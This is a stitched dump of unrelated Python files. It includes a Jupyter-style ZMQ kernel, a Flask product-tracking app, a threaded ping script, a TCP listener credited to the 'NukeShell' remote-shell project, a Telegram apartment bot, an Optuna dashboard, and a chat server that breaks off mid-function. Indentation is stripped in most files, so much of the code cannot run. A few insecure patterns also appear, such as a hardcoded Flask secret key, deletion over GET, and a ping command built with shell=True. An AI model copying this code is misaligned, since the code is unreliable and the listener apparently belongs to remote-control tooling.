def dprint(level, *args, **kwargs):
""" Show debug information """
if level <= debug_level:
print("DEBUG:", *args, file=sys.stderr, **kwargs)
sys.stderr.flush()
class WireProtocol:
def __init__(self, engine_id, secure_key, signature_scheme):
self._engine_id = engine_id
signature_schemes = {"hmac-sha256": hashlib.sha256}
self._auth = hmac.HMAC(
self._str_to_bytes(secure_key),
digestmod=signature_schemes[signature_scheme])
def _str_to_bytes(self, s):
return s.encode('ascii') if PYTHON3 else bytes(s)
def _msg_id(self):
""" Return a new uuid for message id """
return str(uuid.uuid4())
def _new_header(self, msg_type):
"""make a new header"""
return {
"date": datetime.datetime.now().isoformat(),
"msg_id": self._msg_id(),
"username": "kernel",
"session": self._engine_id,
"msg_type": msg_type,
"version": "5.0",
}
def sign(self, msg_lst):
"""
Sign a message with a secure signature.
"""
h = self._auth.copy()
for m in msg_lst:
h.update(m)
return self._str_to_bytes(h.hexdigest())
def serialize_wire_msg(self, msg_type, content=None, parent_header=None, metadata=None, identities=None):
header = self._new_header(msg_type)
if content is None:
content = {}
if parent_header is None:
parent_header = {}
if metadata is None:
metadata = {}
def encode(msg):
return self._str_to_bytes(json.dumps(msg))
msg_lst = [
encode(header),
encode(parent_header),
encode(metadata),
encode(content),
]
signature = self.sign(msg_lst)
parts = [DELIM,
signature,
msg_lst[0],
msg_lst[1],
msg_lst[2],
msg_lst[3]]
if identities:
parts = identities + parts
return parts
def deserialize_wire_msg(self, wire_msg):
"""split the routing prefix and message frames from a message on the wire"""
delim_idx = wire_msg.index(DELIM)
identities = wire_msg[:delim_idx]
m_signature = wire_msg[delim_idx + 1]
msg_frames = wire_msg[delim_idx + 2:]
def decode(msg):
dprint(1, "decode", msg)
return json.loads(msg.decode('ascii') if PYTHON3 else msg)
m = {}
m['header'] = decode(msg_frames[0])
m['parent_header'] = decode(msg_frames[1])
m['metadata'] = decode(msg_frames[2])
m['content'] = decode(msg_frames[3])
dprint(1, "will sign", m)
check_sig = self.sign(msg_frames)
if check_sig != m_signature:
dprint(1, check_sig ,"!=", m_signature)
raise ValueError("Signatures do not match")
dprint(1, "m", m)
dprint(1, "identities", identities)
return identities, m
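# Editor-added, hedged round-trip sketch (never called by this module): serialize a
# message with WireProtocol and deserialize it again.  The key, scheme and content
# values are arbitrary test inputs, not requirements of the protocol.
def _example_wire_roundtrip():
    wire = WireProtocol(engine_id="example-engine",
                        secure_key="example-key",
                        signature_scheme="hmac-sha256")
    parts = wire.serialize_wire_msg("status", content={"execution_state": "idle"})
    # On the receiving side the same frames arrive from zmq as a multipart message.
    identities, msg = wire.deserialize_wire_msg(parts)
    assert msg["content"]["execution_state"] == "idle"
    return identities, msg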
class OutgoingStream:
def __init__(self, wire, stream):
self._wire = wire
self._stream = stream
def send(self, msg_type, content=None, parent_header=None, metadata=None, identities=None):
parts = self._wire.serialize_wire_msg(msg_type, content=content, parent_header=parent_header, metadata=metadata, identities=identities)
dprint(3, "send parts:", parts)
self._stream.send_multipart(parts)
self._stream.flush()
class ShellHandler:
def __init__(self, engine_id, iopub, shell, driver_info, driver):
self._driver_info = driver_info
self._driver = driver
self._engine_id = engine_id
self._iopub = iopub
self._shell = shell
self._execution_count = 1
self._pending_execute_requests = []
self._pending_execute_request = False
def _begin(self, identities, msg, on_done):
execution_count = self._execution_count
started = datetime.datetime.now().isoformat()
parent_header = msg['header']
code = msg['content']["code"]
self._iopub.send('status', {'execution_state': "busy"}, parent_header=parent_header)
self._execution_count += 1
content = {
'execution_count': execution_count,
'code': code,
}
self._iopub.send('execute_input', content, parent_header=parent_header)
def _done(result_data, result_metadata=None):
if result_metadata is None:
result_metadata = {}
self._iopub.send('status', {'execution_state': "idle"}, parent_header=parent_header)
content = {
'execution_count': execution_count,
'data': result_data,
'metadata': result_metadata
}
self._iopub.send('execute_result', content, parent_header=parent_header)
metadata = {
"dependencies_met": True,
"engine": self._engine_id,
"status": "ok",
"started": started,
}
content = {
"status": "ok",
"execution_count": execution_count,
"user_variables": {},
"payload": [],
"user_expressions": {},
}
self._shell.send('execute_reply', content, metadata=metadata,
parent_header=parent_header, identities=identities)
on_done()
return _done
def execute_request(self, identities, msg):
def schedule_next():
print("schedule_next", self._pending_execute_request, self._pending_execute_requests)
if len(self._pending_execute_requests) == 0:
self._pending_execute_request = False
else:
identities2, msg2 = self._pending_execute_requests.pop(0)
self._execute_request(schedule_next, identities2, msg2)
if self._pending_execute_request:
self._pending_execute_requests.append((identities, msg))
else:
self._execute_request(schedule_next, identities, msg)
def _execute_request(self, on_done, identities, msg):
on_result = self._begin(identities, msg, on_done)
code = msg['content']["code"]
has_displayed = set()
def on_display(display_id, data, metadata):
content = {
"data": data,
"metadata": metadata,
"transient": {
"display_id": display_id,
},
}
display_message_type = 'update_display_data'
if display_id not in has_displayed:
display_message_type = 'display_data'
has_displayed.add(display_id)
self._iopub.send(display_message_type, content, parent_header=msg['header'])
def on_stdout(text):
content = {
'name': "stdout",
'text': text,
}
self._iopub.send('stream', content, parent_header=msg['header'])
self._driver(code, on_stdout, on_display, on_result)
def kernel_info_request(self, identities, msg):
content = {}
content.update(self._driver_info)
content.update({
"protocol_version": "5.0",
"ipython_version": [1, 1, 0, ""],
})
self._shell.send('kernel_info_reply', content, parent_header=msg['header'], identities=identities)
def __call__(self, identities, msg):
dprint(1, "shell received:", identities, msg)
# process request:
msg_type = msg['header']["msg_type"]
if msg_type == "execute_request":
self.execute_request(identities, msg)
elif msg_type == "kernel_info_request":
self.kernel_info_request(identities, msg)
elif msg_type == "history_request":
dprint(1, "unhandled history request")
else:
dprint(1, "unknown msg_type:", msg_type)
class Kernel:
def __init__(self, config, driver_info, driver):
# Clone config so we can update it.
config = json.loads(json.dumps(config))
self._config = config
self._exiting = False
self._engine_id = str(uuid.uuid4())
self._wire = WireProtocol(self._engine_id, config["key"], config["signature_scheme"])
connection = config["transport"] + "://" + config["ip"]
def bind(socket, port):
if port <= 0:
return socket.bind_to_random_port(connection)
else:
socket.bind("%s:%s" % (connection, port))
return port
def wrap_with_deserialization(fn):
def accept(wire_msg):
return fn(*self._wire.deserialize_wire_msg(wire_msg))
return accept
## Initialize:
ioloop.install()
ctx = zmq.Context()
self._heartbeat_socket = ctx.socket(zmq.REP)
config["hb_port"] = bind(self._heartbeat_socket, config["hb_port"])
# IOPub/Sub: also called SubSocketChannel in IPython sources
self._iopub_socket = ctx.socket(zmq.PUB)
config["iopub_port"] = bind(self._iopub_socket, config["iopub_port"])
iopub_stream = zmqstream.ZMQStream(self._iopub_socket)
iopub_stream.on_recv(wrap_with_deserialization(self._iopub_handler))
iopub = OutgoingStream(self._wire, iopub_stream)
self._control_socket = ctx.socket(zmq.ROUTER)
config["control_port"] = bind(self._control_socket, config["control_port"])
control_stream = zmqstream.ZMQStream(self._control_socket)
control_stream.on_recv(wrap_with_deserialization(self._control_handler))
self._stdin_socket = ctx.socket(zmq.ROUTER)
config["stdin_port"] = bind(self._stdin_socket, config["stdin_port"])
stdin_stream = zmqstream.ZMQStream(self._stdin_socket)
stdin_stream.on_recv(wrap_with_deserialization(self._stdin_handler))
self._shell_socket = ctx.socket(zmq.ROUTER)
config["shell_port"] = bind(self._shell_socket, config["shell_port"])
shell_stream = zmqstream.ZMQStream(self._shell_socket)
shell = OutgoingStream(self._wire, shell_stream)
shell_stream.on_recv(wrap_with_deserialization(self._shell_handler))
self._shell_handler_impl = ShellHandler(self._engine_id, iopub, shell, driver_info, driver)
def _control_handler(self, identities, msg):
dprint(1, "control received:", identities, msg)
msg_type = msg['header']["msg_type"]
if msg_type == "shutdown_request":
self._shutdown_request(identities, msg)
def _shell_handler(self, identities, msg):
msg_type = msg['header']["msg_type"]
if msg_type == "shutdown_request":
self._shutdown_request(identities, msg)
else:
self._shell_handler_impl(identities, msg)
def _shutdown_request(self, identities, msg):
self.shutdown()
def _iopub_handler(self, identities, msg):
dprint(1, "iopub received:", identities, msg)
def _stdin_handler(self, identities, msg):
dprint(1, "stdin received:", identities, msg)
# Utility functions:
def shutdown(self):
self._exiting = True
ioloop.IOLoop.instance().stop()
def run(self):
dprint(1, "Config:", json.dumps(self._config))
dprint(1, "Starting loops...")
def heartbeat_loop():
dprint(2, "Starting loop for 'Heartbeat'...")
while not self._exiting:
dprint(3, ".", end="")
try:
zmq.device(zmq.FORWARDER, self._heartbeat_socket, self._heartbeat_socket)
except zmq.ZMQError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
hb_thread = threading.Thread(target=heartbeat_loop)
hb_thread.daemon = True
hb_thread.start()
dprint(1, "Ready! Listening...")
ioloop.IOLoop.instance().start()
|
app.py
|
# coding: utf-8
from datetime import datetime, timedelta
import json
from flask import Flask
from flask import render_template, request, session, redirect, url_for, flash
from flask_sockets import Sockets
from flask_mongoengine.pagination import Pagination
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from flask_moment import Moment
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from threading import Thread
import leancloud
from views.todos import todos_view
from search import update_item
from utils import obj_to_dict
app = Flask(__name__)
sockets = Sockets(app)
bootstrap = Bootstrap(app)
moment = Moment(app)
app.config['SECRET_KEY'] = 'hard to guess string'
app.jinja_env.auto_reload = True
# Dynamic routes
app.register_blueprint(todos_view, url_prefix='/todos')
Spu = leancloud.Object.extend('Spu')
Sku = leancloud.Object.extend('Sku')
History = leancloud.Object.extend('History')
class UrlForm(FlaskForm):
url = StringField('Enter the URL:', validators=[DataRequired()])
submit = SubmitField('Submit')
class SearchForm(FlaskForm):
keyword = StringField('Keyword', validators=[DataRequired()])
submit = SubmitField('Search')
@app.route('/', methods=['GET', 'POST'])
def index():
# Pagination.
page = request.args.get('page', 1, type=int)
keyword = request.args.get('keyword')
print(keyword)
query = Spu.query.add_descending('createdAt')
if keyword:
query.contains('name', keyword)
spu_all = query.find()
pg = Pagination(spu_all, page, 20)
# Get and arrange the item data to render.
items = []
for spu_obj in pg.items:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('index.html',
form=form,
items=items,
pagination=pg,
current_time=datetime.utcnow())
@app.route('/latest', methods=['GET', 'POST'])
def latest():
# Pagination.
latest_spus = Spu.query \
.greater_than_or_equal_to('createdAt', datetime.now() - timedelta(days=2))\
.add_descending('createdAt')\
.find()
# Get and arrange the item data to render.
items = []
for spu_obj in latest_spus:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('latest.html',
form=form,
items=items,
current_time=datetime.utcnow())
@app.route('/update30', methods=['GET', 'POST'])
def update30():
# Pagination.
latest_spus = Spu.query \
.add_descending('updatedAt') \
.limit(30)\
.find()
# Get and arrange the item data to render.
items = []
for spu_obj in latest_spus:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('update30.html',
form=form,
items=items,
current_time=datetime.utcnow())
@app.route('/all', methods=['GET', 'POST'])
def all():
# Pagination.
latest_spus = Spu.query \
.add_descending('createdAt') \
.find()
# Get and arrange the item data to render.
items = []
for spu_obj in latest_spus:
spu = spu_obj.dump()
sku_objs = Sku.query \
.equal_to('spu', spu_obj) \
.add_ascending('price').find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
items.append({'spu': spu, 'skus': skus})
# Search online.
form = SearchForm()
if form.validate_on_submit():
input_keyword = form.keyword.data
form.keyword.data = ''
return redirect(url_for('index', keyword=input_keyword))
return render_template('all.html',
form=form,
items=items,
current_time=datetime.utcnow())
@app.route('/commit', methods=['GET', 'POST'])
def commit():
# Form to input the URL.
url = None
form = UrlForm()
if form.validate_on_submit():
url = form.url.data
parse_new(url)
form.url.data = ''
return redirect(url_for('index'))
return render_template('commit.html',
form=form)
@app.route('/sku/<asin>')
def sku(asin):
sku_obj = Sku.query\
.equal_to('asin', asin)\
.include('spu')\
.first()
sku_objs = Sku.query\
.equal_to('spu', sku_obj.get('spu'))\
.add_ascending('price')\
.find()
sku = obj_to_dict(sku_obj)
skus = [obj_to_dict(obj) for obj in sku_objs]
return render_template('sku.html',
sku=sku,
skus=skus)
@app.route('/spu/<asin>')
def spu(asin):
spu_obj = Spu.query \
.equal_to('asin', asin) \
.first()
sku_objs = Sku.query\
.equal_to('spu', spu_obj)\
.add_ascending('price')\
.find()
spu = obj_to_dict(spu_obj)
skus = [obj_to_dict(obj) for obj in sku_objs]
return render_template('spu.html',
spu=spu,
skus=skus)
@app.route('/time')
def time():
return str(datetime.now())
@app.route('/item/<asin>')
def product(asin):
query = Spu.query
query.equal_to('asin', asin)
spu = query.first()
sku_objs = Sku.query\
.equal_to('spu', spu)\
.find()
skus = [sku_obj.dump() for sku_obj in sku_objs]
    return json.dumps({'spu': spu.dump(), 'skus': skus})
@app.route('/delete/<asin>')
def delete_item(asin):
'''asin:: Must be spu asin.'''
spu = Spu.query.equal_to('asin', asin).first()
skus = Sku.query.equal_to('asin', asin).find()
history_list = History.query.equal_to('asin', asin).find()
# history_list = History.query.equal_to('sku', sku).find()
objs = [spu] + skus + history_list
leancloud.Object.destroy_all(objs)
flash('{0} has been deleted.'.format(spu.get('name')))
return redirect(url_for('index'), 301)
@sockets.route('/echo')
def echo_socket(ws):
while True:
message = ws.receive()
ws.send(message)
def async_parse_new(app, url, request):
with app.app_context():
# flash('Parsing item...')
item = update_item(url)
with app.test_request_context():
flash('Ok! Parsed item: {}'.format(item.spu.get('name')))
def parse_new(url):
thr = Thread(target=async_parse_new, args=[app, url, request])
thr.start()
return thr
@app.route('/update')
def update():
asin = request.args.get('asin')
spu = Spu.query.equal_to('asin', asin).first()
return update_item(spu.get('url'))
@app.route('/test')
def test():
asin = request.args.get('asin')
spu = Spu.query.equal_to('asin', asin).first()
    return json.dumps({'asin': asin})
|
pythread3.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from threading import Thread
import subprocess
from Queue import Queue
num_threads = 3
queue = Queue()
ips = ["10.0.0.1", "10.0.0.51"]
def pinger(i, q):
    """ping subnet"""
    while True:
        ip = q.get()
        print "Thread %s: Pinging %s" % (i, ip)
        ret = subprocess.call("ping -c 1 %s" % ip,
                              shell=True,
                              stdout=open('/dev/null', 'w'),
                              stderr=subprocess.STDOUT)
        if ret == 0:
            print "%s: is alive" % ip
        else:
            print "%s: did not respond" % ip
        # Mark the work item as done so queue.join() can eventually return.
        q.task_done()
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
for ip in ips:
queue.put(ip)
print "Main Thread Waiting"
queue.join()
print "Done"
|
server.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Author : LimerBoy
# github.com/LimerBoy/NukeShell
# Import modules
from sys import exit
from time import sleep
from colorama import Fore
from threading import Thread
from Core.clients import Client, ClientsManager
from socket import socket, \
AF_INET, SOCK_STREAM, SO_REUSEADDR, SOL_SOCKET, SHUT_RDWR
""" TCP server class """
class ServerListen:
""" Constructor """
def __init__(self, host, port):
self.host = host
self.port = port
self.ServerStopped = False
self.server = self.InitServer(host, port)
Thread(target=self.AcceptClients).start()
# Stop server
def StopServer(self):
self.ServerStopped = True
ConnectedClients = ClientsManager.GetConnectedClients()
clients = len(ConnectedClients)
print(f"\n{Fore.RED}[Server]{Fore.WHITE} Disconnecting {clients} clients ...")
# Disconnect all clients
for client in ConnectedClients:
Thread(target=client.Disconnect).start()
# Wait for all clients disconnection
# while len(ConnectedClients) != 0:
# print(len(ConnectedClients))
# sleep(0.2)
sleep(clients / 2)
# Stop tcp server
print(f"{Fore.RED}[Server]{Fore.WHITE} Stopping server ...")
self.server.shutdown(SHUT_RDWR)
self.server.close()
exit(1)
# Initialize server socket
@staticmethod
def InitServer(host="0.0.0.0", port=5125) -> socket:
# Create sockets
server = socket(
AF_INET,
SOCK_STREAM
)
# Settings
server.settimeout(50)
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# Bind socket
server.bind((host, port))
server.listen(5)
print(f"{Fore.GREEN}[Server]{Fore.WHITE} Listening at {host}:{port} ...{Fore.RESET}")
return server
# Accept all connections
    def AcceptClients(self):
        while True:
            connection = None
            # Client connected
            try:
                connection, address = self.server.accept()
                Client(connection, address)
            except OSError as e:
                if self.ServerStopped:
                    return
                # accept() can fail before connection/address are assigned,
                # so guard against unbound names here.
                if connection is not None:
                    connection.close()
                print(f"{Fore.RED}[Server]{Fore.WHITE} Failed to accept a client", Fore.RESET, e)
                self.__init__(self.host, self.port)
                break
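# Usage sketch (an assumption, not part of the original script): the listener
# starts its accept loop in a background thread as soon as it is constructed,
# so a minimal entry point only needs to build the object and later call
# StopServer() to disconnect clients and shut the socket down.
#
#     if __name__ == "__main__":
#         listener = ServerListen("0.0.0.0", 5125)
#         try:
#             while True:
#                 sleep(1)
#         except KeyboardInterrupt:
#             listener.StopServer()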
|
client.py
|
import threading
from enum import Enum
from typing import Union, List, TYPE_CHECKING
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup, InputMediaPhoto
from telegram.ext import Updater, CallbackQueryHandler, CallbackContext
if TYPE_CHECKING:
from harbor.db.models import DbApartment, DbApartmentPhoto
ChatId = Union[str, int]
class BotAction(Enum):
Error = 'error'
Like = 'like'
Dislike = 'dislike'
class BotClient:
def __init__(self, api_token: str, main_chat_id: ChatId):
self._main_chat_id = main_chat_id
self._updater = Updater(token=api_token, use_context=True)
self._dispatcher = self._updater.dispatcher
self._dispatcher.add_handler(
CallbackQueryHandler(
self._error_decorator(self._apartment_action_callback), pattern=r'^like|^dislike'
)
)
self._dispatcher.add_error_handler(self._error_callback)
self._polling_thread = None
self._handlers = {
BotAction.Like: None,
BotAction.Dislike: None,
BotAction.Error: None
}
def start_polling(self):
"""
Start receiving events
"""
if not self._polling_thread:
self._polling_thread = threading.Thread(target=self._updater.start_polling)
self._polling_thread.start()
def idle(self):
"""
Waiting CTRL+C for exit
"""
self._updater.idle()
def stop_polling(self):
"""
Stop receiving events
"""
if self._polling_thread:
self._updater.stop()
self._polling_thread = None
def add_handler(self, action: BotAction, callback):
self._handlers[action] = callback
def post_apartment_photos(self, photos: List['DbApartmentPhoto']) -> List[int]:
media = [InputMediaPhoto(p.absolute_photo_url) for p in photos]
photo_messages = self._updater.bot.send_media_group(
chat_id=self._main_chat_id,
media=media,
timeout=20,
)
message_ids = [m.message_id for m in photo_messages]
return message_ids
def post_apartment_description(self, apartment: 'DbApartment') -> int:
star_btn = InlineKeyboardButton(
text="👍",
callback_data=f'{BotAction.Like.value};{apartment.row_id}'
)
skip_btn = InlineKeyboardButton(
text="Не интересно",
callback_data=f'{BotAction.Dislike.value};{apartment.row_id}'
)
reply_markup = InlineKeyboardMarkup(
[[star_btn, skip_btn]]
)
response = self._updater.bot.send_message(
chat_id=self._main_chat_id,
text=f'{apartment.price}\n'
f'{apartment.square} / {apartment.useful_square} / {apartment.kitchen_square} m2\n'
f'{apartment.address}\n'
f'{apartment.short_description}\n\n'
f'{apartment.absolute_url}',
reply_markup=reply_markup,
timeout=20,
)
return response.message_id
def update_apartment_message(self, message_id: int, apartment: 'DbApartment') -> int:
response = self._updater.bot.edit_message_text(
chat_id=self._main_chat_id,
message_id=message_id,
text=f'{apartment.price}\n'
f'{apartment.square} / {apartment.useful_square} / {apartment.kitchen_square} m2\n'
f'{apartment.address}\n'
f'{apartment.short_description}\n\n'
f'{apartment.absolute_url}',
reply_markup=None,
timeout=20,
)
return response.message_id
def delete_apartment_message(self, apartment: 'DbApartment'):
tel_message_ids = apartment.telegram.get_message_ids()
for m_id in tel_message_ids:
self._updater.bot.delete_message(self._main_chat_id, int(m_id), timeout=20)
def _apartment_action_callback(self, update: Update, context: CallbackContext):
query_data = update.callback_query.data # type: str
query_action, query_value = tuple(query_data.split(';'))
message_id = update.callback_query.message.message_id
query_action = BotAction(query_action)
query_value = int(query_value)
if query_action == BotAction.Like:
self._on_like_handler(message_id, query_value)
elif query_action == BotAction.Dislike:
self._on_dislike_handler(message_id, query_value)
def _error_decorator(self, callback):
def decorator(update: 'Update', context: 'CallbackContext', *args):
try:
callback(update, context)
except Exception as e:
self._on_error_handler(e)
return decorator
def _error_callback(self, update: 'Update', context: 'CallbackContext'):
self._on_error_handler(context.error)
def _on_error_handler(self, error):
callback = self._handlers.get(BotAction.Error, None)
if callback:
callback(error)
def _on_like_handler(self, message_id: int, obj_id: int):
callback = self._handlers.get(BotAction.Like, None)
if callback:
callback(message_id, obj_id)
def _on_dislike_handler(self, message_id: int, obj_id: int):
callback = self._handlers.get(BotAction.Dislike, None)
if callback:
callback(message_id, obj_id)
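# Usage sketch (an assumption; the token, chat id and handler below are
# hypothetical): handlers are registered per BotAction before polling starts,
# and idle() blocks until the process receives an interrupt.
#
#     def on_like(message_id, apartment_id):
#         print('liked', apartment_id, 'via message', message_id)
#
#     client = BotClient(api_token='123:ABC', main_chat_id='@my_channel')
#     client.add_handler(BotAction.Like, on_like)
#     client.start_polling()
#     client.idle()
#     client.stop_polling()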
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
import optuna.logging
import optuna.structs
import optuna.study
from optuna import types
if types.TYPE_CHECKING:
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field) for field in
['number', 'state', 'value', 'params', 'datetime_start', 'datetime_complete']
])
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'number': [trial.number for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start': [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None for trial in trials
],
'datetime_complete': [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]],
sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
# type: () -> None
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
# instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
# for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
# version 0.12.15. In addition, we will need to do many configuration to servers, which can be
# done automatically with the following one line. So, for now, we decided to use this way.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
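# Usage sketch (an assumption, not part of the original module): both entry
# points take an existing study object; serve() launches a Bokeh server via
# Bokeh's CLI bootstrap, while write() renders a static HTML snapshot.
#
#     >>> study = optuna.study.create_study()
#     >>> serve(study)                       # blocks and opens a browser tab
#     >>> write(study, 'dashboard.html')     # writes a one-off HTML file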
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
server.py
|
import socket
from threading import Thread
import threading
def get_user():
while True:
conn, addr = sock.accept()
conns.append({"conn": conn, "socket": addr})
print("connected:", addr)
threading.Thread(target=receive, args=[conn]).start()
def receive(conn):
    while True:
        try:
            data = conn.recv(4096)
            if not data:
                # An empty read means the peer closed the connection.
                break
            message = data.decode("utf-8")
